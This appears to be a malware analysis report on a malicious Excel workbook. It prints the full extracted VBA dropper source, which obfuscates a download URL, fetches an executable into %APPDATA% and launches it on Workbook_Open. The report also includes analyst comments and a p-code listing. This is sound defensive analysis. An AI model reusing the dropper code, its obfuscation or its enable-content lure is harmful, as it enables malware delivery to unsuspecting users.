Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a5a424fd7c494269…

MALICIOUS

Office (OLE)

160.5 KB Created: 2020-07-23 10:42:16 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 633fbc752747a1f7cc051aabf87875a4 SHA-1: 3ed4edbd22477a4d278b8286c1919db12a8fd0c0 SHA-256: a5a424fd7c494269839a444b8273d69952c6f0547abec02eab32af181f0104f6
216 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter

The sample is an Excel workbook whose `Workbook_Open` VBA macro runs automatically once the document is opened and the user has enabled content. The macro imports `URLDownloadToFileA` (urlmon) and `ShellExecuteA` (shell32) under randomized alias names and keeps both the download URL and the drop filename as obfuscated string literals; a small `Decrypt` routine recovers them at runtime by reversing the string and subtracting 1 from every character code. The two literals in the source are "fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui" and "fyf/ttbb"; applying that transform by hand yields a download URL of hxxps://nilemixitupd[.]biz[.]pl/showih/jujryw(1).exe and a drop path of %APPDATA%\aass.exe (decoded manually from the listing — confirm by executing `Decrypt` in a sandbox). The macro downloads the second-stage payload to that path and immediately launches it via ShellExecuteA with the "open" verb, discarding the return value of both API calls. The document body prompts the user to enable content, a common lure for macro-based droppers. This is a static result only: the payload was not retrieved, so nothing in this report establishes what the second stage is, and the macro itself installs no persistence.

Heuristics 7

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function nYNiXOdnVVIvWsFTBSE Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal IiWTNgdAVuAwHLZv As Long, ByVal xGQK As String, _
    ByVal oEWrK As String, ByVal EuZjjimXQXCOOeildBQJt As Long, ByVal beybftDY As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    SCNTPJYGHDMjhgYgHDJhjF = Decrypt("fyf/ttbb")
    bsGOPZxsVWDKdlbGBCAFInmhun = Environ$("AppData") & "\" & SCNTPJYGHDMjhgYgHDJhjF
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a social-engineering lure used by droppers to talk the user into disabling Office's macro protections; it does not bypass those controls technically, so a policy that blocks macros from the internet (Mark-of-the-Web) still stops the chain before Workbook_Open runs

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9618 bytes
SHA-256: abdb40e88e155f6c162ac77a05a2a7f3897e88820fed26a88ebdb24d3ccc907e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Empty stub in Module1. Nothing in the extracted source references it; it
' appears to exist only so the module is non-empty.
Sub Dil()

End Sub

Attribute VB_Name = "UJFkrkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' --- Win32 imports --------------------------------------------------------
' Four declarations of winmm!timeGetTime under name variants (etTime,
' timeGetTime, imeGetTime, meGetTime). None of them is called anywhere in
' the extracted source; they look like filler around the two real imports.
' NOTE(review): the first two Declares omit PtrSafe. Under 64-bit Office
' (VBA7) a Declare without PtrSafe is a compile error for the whole module,
' so this project presumably only runs under 32-bit Office unless cached
' p-code is executed instead of recompiling — confirm by detonation.
Private Declare Function etTime Lib "winmm.dll" () As Long


Private Declare Function timeGetTime Lib "winmm.dll" () As Long

Private Declare PtrSafe Function imeGetTime Lib "winmm.dll" () As Long

' shell32!ShellExecuteA imported under a random alias. Called from qxEU to
' launch the dropped file ("open" verb). Parameter order is the Win32 one:
' hwnd, lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd.
Private Declare PtrSafe Function Hwclmk Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal mYLnJHkRjU As Long, ByVal YyYkewtQmKCzKcqLzIhcEG As String, _
ByVal nHMUKqzz As String, ByVal yDZhoSgfvyB As String, ByVal tRhZJsuOrwJGpCccD As String, ByVal LXAT As Long) As Long

' urlmon!URLDownloadToFileA imported under a random alias. Called from qxEU
' to fetch the payload to disk: pCaller, szURL, szFileName, dwReserved, lpfnCB.
Private Declare PtrSafe Function nYNiXOdnVVIvWsFTBSE Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal IiWTNgdAVuAwHLZv As Long, ByVal xGQK As String, _
ByVal oEWrK As String, ByVal EuZjjimXQXCOOeildBQJt As Long, ByVal beybftDY As Long) As Long

Private Declare PtrSafe Function meGetTime Lib "winmm.dll" () As Long


' Dropper routine, invoked from Workbook_Open.
'   1. Decrypt("fyf/ttbb")            -> "aass.exe"   (StrReverse, then char-1; see Decrypt)
'   2. drop path = Environ("AppData") & "\" & that   -> %APPDATA%\aass.exe
'   3. Decrypt(URL literal)           -> hxxps://nilemixitupd[.]biz[.]pl/showih/jujryw(1).exe
'      (decoded by hand from the literal below — confirm in a sandbox)
'   4. URLDownloadToFileA(0, url, path, 0, 0)
'   5. ShellExecuteA(0, "open", path, "", vbNullString, vbNormalFocus)
' Both API calls are made as statements, so their return values (and any
' download failure) are silently ignored. Three of the six locals are never used.
Sub qxEU()
Dim pAuMwLKkfkFDfgxSGfgD As String          ' decoded download URL
Dim SCNTPJYGHDMjhgYgHDJhjF As String        ' decoded drop filename
Dim bsGOPZxsVWDKdlbGBCAFInmhun As String    ' full drop path under %APPDATA%
Dim wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd As String   ' unused
Dim HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD As String          ' unused
Dim pQkPoFRGDxPMjSekgrIJ As String                       ' unused
SCNTPJYGHDMjhgYgHDJhjF = Decrypt("fyf/ttbb")
bsGOPZxsVWDKdlbGBCAFInmhun = Environ$("AppData") & "\" & SCNTPJYGHDMjhgYgHDJhjF


pAuMwLKkfkFDfgxSGfgD = Decrypt("fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui")

' URLDownloadToFileA(pCaller=0, szURL, szFileName, dwReserved=0, lpfnCB=0)
nYNiXOdnVVIvWsFTBSE 0, pAuMwLKkfkFDfgxSGfgD, bsGOPZxsVWDKdlbGBCAFInmhun, 0, 0
' ShellExecuteA(hwnd=0, "open", file, params="", dir=NULL, SW_SHOWNORMAL)
Hwclmk 0, "open", bsGOPZxsVWDKdlbGBCAFInmhun, "", vbNullString, vbNormalFocus
End Sub

' Auto-exec entry point: Excel runs this when the workbook opens (after the
' user enables macros). Its only job is to call the dropper.
Sub Workbook_Open()

qxEU
End Sub


' Head of a nine-function call chain (DisHp4e1dEwtDO8XRgW -> t7IOznwCrl -> ...
' -> lkYXBK4r3WCbBQoVfs4z78R -> FZ4yZPaWVH). Nothing in the extracted source
' calls it, no function in the chain assigns its return value, and the final
' target FZ4yZPaWVH is not defined anywhere in the listing. Dead filler code.
Function DisHp4e1dEwtDO8XRgW() As Currency
Call t7IOznwCrl
End Function
' Filler chain link: only calls the next function, never sets its return value.
Static Function t7IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4
End Function
' Filler chain link: only calls the next function, never sets its return value.
Function Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Jb8AvPk2VR
End Function
' Filler chain link: only calls the next function, never sets its return value.
Static Function Jb8AvPk2VR() As Date
Call TJW8h3uwBHyE3XYkFXIADNkq
End Function
' Filler chain link: only calls the next function, never sets its return value.
Function TJW8h3uwBHyE3XYkFXIADNkq() As Variant
Call JxU0xFkI7x
End Function
' Filler chain link: only calls the next function, never sets its return value.
Static Function JxU0xFkI7x() As Date
Call rzGwrPUM9xS2rvCsRX6OdVek
End Function
' Filler chain link: only calls the next function, never sets its return value.
Function rzGwrPUM9xS2rvCsRX6OdVek() As Variant
Call hx2errEArb
End Function
' Filler chain link: only calls the next function, never sets its return value.
Static Function hx2errEArb() As Double
Call lkYXBK4r3WCbBQoVfs4z78R
End Function
' Last link of the filler chain. FZ4yZPaWVH is not defined in the extracted
' source, so if Office recompiles this module from source the call would be a
' "Sub or Function not defined" compile error; whether that matters depends on
' whether stored p-code runs instead — confirm on detonation. Never reached
' from Workbook_Open in any case.
Function lkYXBK4r3WCbBQoVfs4z78R() As Single
Call FZ4yZPaWVH
End Function

' String deobfuscation used for both literals in qxEU.
' Algorithm: reverse the input, then map every character c to Chr(AscW(c) - 1).
'   Decrypt("fyf/ttbb")                                  = "aass.exe"
'   Decrypt("fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui")
'       = hxxps://nilemixitupd[.]biz[.]pl/showih/jujryw(1).exe  (defanged; decoded by hand)
' The module has no Option Explicit, so nn and enc are implicit Variants.
' bbop, cost and nn are reassigned on every iteration and never read (junk);
' the trailing For loop runs Len(enc) = Len(Empty) = 0 times. The local named
' AppData is just the output accumulator and is unrelated to Environ("AppData").
' enci is a ByRef Variant and is overwritten in place, but every caller passes
' a literal, so there is no visible side effect.
Function Decrypt(enci)
    Dim bbop As String
    Dim cost As Date
    Dim vcninDkMDYSfv
    Dim AppData
    Dim ikolpliktrUjmM
    Dim np As Byte
    enci = StrReverse(enci)
    For ikolpliktrUjmM = 1 To Len(enci)
        vcninDkMDYSfv = Mid(enci, ikolpliktrUjmM, 1)
        
        ' junk assignments — none of these is read
        bbop = ""
        cost = 19 / 6 / 2190
        nn = 1
AppData = AppData & Chr(AscW(vcninDkMDYSfv) - 1)
    Next
 
Decrypt = AppData

' enc is never assigned, so this loop body (empty anyway) never executes
For np = 1 To Len(enc)

Next
    
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_5g3uxr3m
' ===============================================================================
' NOTE (analyst): the identifier names in this p-code disassembly do not line up
' with the decompressed source above (e.g. "Sub Sheet3()" here vs "Sub Dil()" in
' Module1, and Lib "Hwclmk" where the source has Lib "winmm.dll"). The opcode
' structure does match the source — the same two LitStr constants, an ArgsCall
' with 5 arguments (URLDownloadToFileA) followed by one with 6 (ShellExecuteA),
' and a nine-function filler chain ending in an undefined target — so this looks
' like an identifier-table offset in the disassembler rather than VBA stomping,
' but confirm that p-code and source agree before relying on either as evidence.
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 911 bytes
' Line #0:
' 	FuncDefn (Sub Sheet3())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/UJFkrkbook - 9200 bytes
' Line #0:
' 	FuncDefn (Private Declare Function Workbook Lib "Hwclmk" () As Long)
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Private Declare Function mYLnJHkRjU Lib "Hwclmk" () As Long)
' Line #4:
' Line #5:
' 	FuncDefn (Private Declare PtrSafe Function YyYkewtQmKCzKcqLzIhcEG Lib "Hwclmk" () As Long)
' Line #6:
' Line #7:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function yDZhoSgfvyB Lib "oEWrK" (ByVal tRhZJsuOrwJGpCccD As Long, ByVal LXAT As String, ByVal shell32.dll As String, ByVal nYNiXOdnVVIvWsFTBSE As String, ByVal IiWTNgdAVuAwHLZv As String, ByVal xGQK As Long) As Long)
' Line #8:
' Line #9:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function EuZjjimXQXCOOeildBQJt Lib "SCNTPJYGHDMjhgYgHDJhjF" (ByVal beybftDY As Long, ByVal urlmon As String, ByVal meGetTime As String, ByVal qxEU As Long, ByVal pAuMwLKkfkFDfgxSGfgD As Long) As Long)
' Line #10:
' Line #11:
' 	FuncDefn (Private Declare PtrSafe Function bsGOPZxsVWDKdlbGBCAFInmhun Lib "Hwclmk" () As Long)
' Line #12:
' Line #13:
' Line #14:
' 	FuncDefn (Sub wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd())
' Line #15:
' 	Dim 
' 	VarDefn HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD (As String)
' Line #16:
' 	Dim 
' 	VarDefn pQkPoFRGDxPMjSekgrIJ (As String)
' Line #17:
' 	Dim 
' 	VarDefn Decrypt (As String)
' Line #18:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #19:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #20:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #21:
' 	LitStr 0x0008 "fyf/ttbb"
' 	ArgsLd Workbook_Open 0x0001 
' 	St pQkPoFRGDxPMjSekgrIJ 
' Line #22:
' 	LitStr 0x0007 "AppData"
' 	ArgsLd DisHp4e1dEwtDO8XRgW$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld pQkPoFRGDxPMjSekgrIJ 
' 	Concat 
' 	St Decrypt 
' Line #23:
' Line #24:
' Line #25:
' 	LitStr 0x0030 "fyf/*2)xzskvk0ijxpit0mq/{jc/eqvujyjnfmjo00;tquui"
' 	ArgsLd Workbook_Open 0x0001 
' 	St HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD 
' Line #26:
' Line #27:
' 	LitDI2 0x0000 
' 	Ld HyMWFFssTcAEdftghuYUuJIkmnbhgvcCD 
' 	Ld Decrypt 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall EuZjjimXQXCOOeildBQJt 0x0005 
' Line #28:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld Decrypt 
' 	LitStr 0x0000 ""
' 	Ld t7IOznwCrl 
' 	Ld Dp62rz6kt90kDRkudpcs1fW4 
' 	ArgsCall yDZhoSgfvyB 0x0006 
' Line #29:
' 	EndSub 
' Line #30:
' Line #31:
' 	FuncDefn (Sub Jb8AvPk2VR())
' Line #32:
' Line #33:
' 	ArgsCall wvLBEvUxdZIwRKUHGDFolkmNHgvcdERftGHSvfhd 0x0000 
' Line #34:
' 	EndSub 
' Line #35:
' Line #36:
' Line #37:
' 	FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency)
' Line #38:
' 	ArgsCall (Call) JxU0xFkI7x 0x0000 
' Line #39:
' 	EndFunc 
' Line #40:
' 	FuncDefn (Static Function JxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #41:
' 	ArgsCall (Call) rzGwrPUM9xS2rvCsRX6OdVek 0x0000 
' Line #42:
' 	EndFunc 
' Line #43:
' 	FuncDefn (Function rzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #44:
' 	ArgsCall (Call) hx2errEArb 0x0000 
' Line #45:
' 	EndFunc 
' Line #46:
' 	FuncDefn (Static Function hx2errEArb(id_FFFE As Date) As Date)
' Line #47:
' 	ArgsCall (Call) lkYXBK4r3WCbBQoVfs4z78R 0x0000 
' Line #48:
' 	EndFunc 
' Line #49:
' 	FuncDefn (Function lkYXBK4r3WCbBQoVfs4z78R(id_FFFE As Variant) As Variant)
' Line #50:
' 	ArgsCall (Call) FZ4yZPaWVH 0x0000 
' Line #51:
' 	EndFunc 
' Line #52:
' 	FuncDefn (Static Function FZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #53:
' 	ArgsCall (Call) DecryptON 0x0000 
' Line #54:
' 	EndFunc 
' Line #55:
' 	FuncDefn (Function DecryptON(id_FFFE As Variant) As Variant)
' Line #56:
' 	ArgsCall (Call) enci 0x0000 
' Line #57:
' 	EndFunc 
' Line #58:
' 	FuncDefn (Static Function enci(id_FFFE As Double) As Double)
' Line #59:
' 	ArgsCall (Call) bbop 0x0000 
' Line #60:
' 	EndFunc 
' Line #61:
' 	FuncDefn (Function bbop(id_FFFE As Single) As Single)
' Line #62:
' 	ArgsCall (Call) cost 0x0000 
' Line #63:
' 	EndFunc 
' Line #64:
' Line #65:
' 	FuncDefn (Function Workbook_Open(AppData, id_FFFE As Variant))
' Line #66:
' 	Dim 
' 	VarDefn ikolpliktrUjmM (As String)
' Line #67:
' 	Dim 
' 	VarDefn np (As Date)
' Line #68:
' 	Dim 
' 	VarDefn StrReverse
' Line #69:
' 	Dim 
' 	VarDefn nn
' Line #70:
' 	Dim 
' 	VarDefn Chr
' Line #71:
' 	Dim 
' 	VarDefn AscW (As Byte)
' Line #72:
' 	Ld AppData 
' 	ArgsLd enc 0x0001 
' 	St AppData 
' Line #73:
' 	StartForVariable 
' 	Ld Chr 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AppData 
' 	FnLen 
' 	For 
' Line #74:
' 	Ld AppData 
' 	Ld Chr 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St StrReverse 
' Line #75:
' Line #76:
' 	LitStr 0x0000 ""
' 	St ikolpliktrUjmM 
' Line #77:
' 	LitDI2 0x0013 
' 	LitDI2 0x0006 
' 	Div 
' 	LitDI2 0x088E 
' 	Div 
' 	St np 
' Line #78:
' 	LitDI2 0x0001 
' 	St _B_str_Environ 
' Line #79:
' 	Ld nn 
' 	Ld StrReverse 
' 	ArgsLd _B_var_nn 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd _B_var_Mid 0x0001 
' 	Concat 
' 	St nn 
' Line #80:
' 	StartForVariable 
' 	Next 
' Line #81:
' Line #82:
' 	Ld nn 
' 	St Workbook_Open 
' Line #83:
' Line #84:
' 	StartForVariable 
' 	Ld AscW 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld _B_var_Chr 
' 	FnLen 
' 	For 
' Line #85:
' Line #86:
' 	StartForVariable 
' 	Next 
' Line #87:
' Line #88:
' 	EndFunc 
' Line #89:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes